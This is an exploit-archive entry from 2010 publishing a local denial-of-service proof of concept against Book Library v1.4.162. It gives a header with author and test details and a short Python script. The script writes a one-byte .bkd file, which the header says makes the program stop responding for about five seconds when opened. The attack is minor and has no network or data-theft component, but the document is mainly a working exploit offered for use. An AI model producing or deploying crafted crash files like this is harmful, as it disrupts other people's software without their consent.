[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Book Library v1.4.162 Local Dos .bkd File
# Published : 2010-04-14
# Author : chap0
# Previous Title : MovieLibrary v1.4.401 Local Dos .dmv File
# Next Title : RPM Select/Elite v5.0 (.xml config parsing) unicode buffer overflow PoC
# Exploit Title: Book Library Local Dos .bkd file
# Date: April 14, 2010
# Software Link: [http://wensoftware.com/]
# Version: v1.4.162
# Tested on: Windows XP SP3
# Author: chap0
# Email: chap0x90[at]gmail[dot]com
# Site: [www.setfreesecurity.com]
#
# Click Open at top ->
# Find your .bkd file
# No Response about 5 sec
#
# Greetz Daddas, Exploit-DB crew
#
# I'ts hard to concentrate with echo's of your voice in my head.
#
#!/usr/bin/env python
import time
print "The Encyclopedia of Unsolved Mysteriesn"
time.sleep(1)
book=open('unsolved.bkd', 'w')
book.write('x00')
book.close()
print "UFO's, Atlantis, Nessie, Oh My!n"